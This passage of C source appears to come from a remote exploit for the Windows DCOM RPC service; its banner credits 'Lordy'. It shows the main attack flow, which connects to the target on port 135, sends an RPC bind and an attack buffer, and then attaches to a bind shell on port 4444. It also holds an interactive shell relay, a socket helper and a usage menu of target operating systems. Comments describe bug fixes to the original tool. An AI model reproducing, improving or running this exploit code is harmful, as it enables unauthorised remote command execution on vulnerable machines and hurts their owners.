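        fprintf(stderr, " [-] Attack buffer (%d bytes) is too small for the payload.\n", DEF_BF);
        return 1;
    }

    fprintf(stdout, " [2] Trying %s:%i ...\n", def_host, port_connect);
    sock = sexsock(def_host, port_connect);
    re_connt_lm(sock);                  /* exits on -1 */
    fprintf(stdout, " [3] Connected to %s:%i.\n", def_host, port_connect);

    if (send(sock, (const char *)bindstr, (int)sizeof(bindstr), 0) != (int)sizeof(bindstr))
        net_fail(sock, "send(bind)");
    got = recv(sock, (char *)get_bf, (int)sizeof(get_bf), 0);
    if (got <= 0)
        net_fail(sock, "recv(bind reply)");
    /* The reply is not parsed: a rejected bind only shows up as "no shell" later. */
    fprintf(stdout, " [4] Send, attack code.\n");
    if (send(sock, (const char *)atk_bf, atk_len, 0) != atk_len)
        net_fail(sock, "send(attack)");
    closesocket(sock);

    fprintf(stdout, " [5] OK, Trying %s:%i ...\n", def_host, port_back);
    fprintf(stdout, " [*] Waiting, cmd shell ");
    fflush(stdout);
    for (i = 0; i < 3; i++) {
        Sleep(1000);                    /* milliseconds */
        fprintf(stdout, ".");
        fflush(stdout);
    }
    fprintf(stdout, "\n");

    sock = sexsock(def_host, port_back);
    re_connt_lm(sock);
    start_shell(sock);
    closesocket(sock);
    WSACleanup();
    return 0;
}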
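/*
 * Open a TCP connection to conn_host_nm:conn_port_nm.
 * Returns the connected socket as an int (the convention the rest of this
 * file uses) or -1 on failure, which is what re_connt_lm() tests for.
 * gimmeip() exits the process on a resolve failure, so that path never
 * returns here.
 *
 * Fixes over the original: the socket is closed when connect() fails (it
 * leaked before); Winsock errors are reported with WSAGetLastError(), which
 * perror() never sees on Windows; the whole sockaddr_in is zeroed rather
 * than only sin_zero.  WSAStartup() is still called once per connection, as
 * the original did.
 */
int sexsock(char *conn_host_nm, int conn_port_nm)
{
    WSADATA wsdata;
    SOCKET sock;
    struct sockaddr_in sxp_addr;

    if (WSAStartup(MAKEWORD(2, 0), &wsdata) != 0) {
        printf("[x] WSAStartup error...\n");
        return -1;
    }

    memset(&sxp_addr, 0, sizeof(sxp_addr));
    sxp_addr.sin_family = AF_INET;
    sxp_addr.sin_port = htons((unsigned short)conn_port_nm);
    sxp_addr.sin_addr.s_addr = (unsigned long)gimmeip(conn_host_nm);

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        fprintf(stderr, " [-] socket() error: %d\n", WSAGetLastError());
        return -1;
    }
    if (connect(sock, (struct sockaddr *)&sxp_addr, sizeof(sxp_addr)) == SOCKET_ERROR) {
        fprintf(stderr, " [-] connect() error: %d\n", WSAGetLastError());
        closesocket(sock);
        return -1;
    }
    return (int)sock;
}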
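/*
 * Interactive relay: whatever the remote shell sends is written to stdout;
 * when nothing arrives within RECVTIMEOUT seconds, one read() from stdin is
 * forwarded to the socket.  Returns when either side closes or errors.
 * (While blocked in read() on stdin, output from the shell is not shown
 * until the next line is entered — same as the original.)
 *
 * Fixes over the original: the select() read set is a real fd_set built with
 * FD_ZERO/FD_SET instead of a two-element unsigned long array cast to
 * fd_set* (which matched Winsock's layout only on 32-bit builds), select()
 * errors end the loop instead of being treated as a timeout, and the local
 * no longer shadows the C library's time().
 */
void start_shell(int sock)
{
    char buf[1000];
    fd_set rfds;
    struct timeval tv;
    int n;

    for (;;) {
        /* Rebuilt every turn: the set is consumed by select(). */
        FD_ZERO(&rfds);
        FD_SET((SOCKET)sock, &rfds);
        tv.tv_sec = RECVTIMEOUT;
        tv.tv_usec = 0;

        n = select(0, &rfds, NULL, NULL, &tv);   /* nfds is ignored by Winsock */
        if (n == SOCKET_ERROR) {
            printf("[x] select() error: %d.\n", WSAGetLastError());
            return;
        }
        if (n > 0) {
            n = recv(sock, buf, sizeof(buf), 0);
            if (n <= 0) {
                printf("[x] Connection closed.\n");
                return;
            }
            if (write(1, buf, n) <= 0) {
                printf("[x] Connection closed.\n");
                return;
            }
        } else {
            /* Timed out with nothing from the shell: take a line from the user. */
            n = read(0, buf, sizeof(buf));
            if (n <= 0) {
                printf("[x] Connection closed.\n");
                return;
            }
            if (send(sock, buf, n, 0) <= 0) {
                printf("[x] Connection closed.\n");
                return;
            }
        }
    }
}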
/*
 * Guard after sexsock(): anything but its -1 failure value is a live socket
 * and the call returns; on -1 print the failure text and exit(-1).
 */
void re_connt_lm(int st_sock_va)
{
    if (st_sock_va != -1)
        return;
    fputs(" [-] Failed.\n\n", stdout);
    fputs(" Happy Exploit ! :-)\n\n", stdout);
    exit(-1);
}
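/*
 * Print the usage text and the -t target menu, then exit(0).  main() calls
 * it for every option error as well, so it never returns; the exit status
 * is left at 0 as before.  Walks __pt_pkg_form up to the 0x82 sentinel row.
 *
 * Text fixes: "Exmaple" typo, and the -b line no longer claims to choose the
 * port the shell binds — the shellcode's port is fixed (4444); -b only sets
 * where this client connects afterwards.
 */
void pri_usg(char *f_nm)
{
    const struct os_plat_pk *t;

    fprintf(stdout, " Usage: %s -option [argument]\n\n", f_nm);
    fprintf(stdout, "\t -h [hostname] - target host.\n");
    fprintf(stdout, "\t -p [port to connect] - port to connect in the target, default 135.\n");
    fprintf(stdout, "\t -b [port to connect back] - port to connect to for the shell, default 4444 (the shellcode always listens on 4444).\n");
    fprintf(stdout, "\t -t [number] - select target number.\n\n");
    fprintf(stdout, " Select target number>\n\n");
    for (t = __pt_pkg_form; t->op_pk_num != 0x82; t++)
        fprintf(stdout, "\t {%d} %s\n", t->op_pk_num, t->op_pk_str);
    fprintf(stdout, "\n Example> %s -h 192.168.0.1 -t3 -p135 -b3333\n\n", f_nm);
    exit(0);
}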
/* Print the program banner to stdout. */
void pri_banrl(void)
{
    fputs("\n DCOM RPC WIN32 remote exploit by Lordy - Lordillusions Company(C)\n(Most languages)\n\n", stdout);
}
/* eox */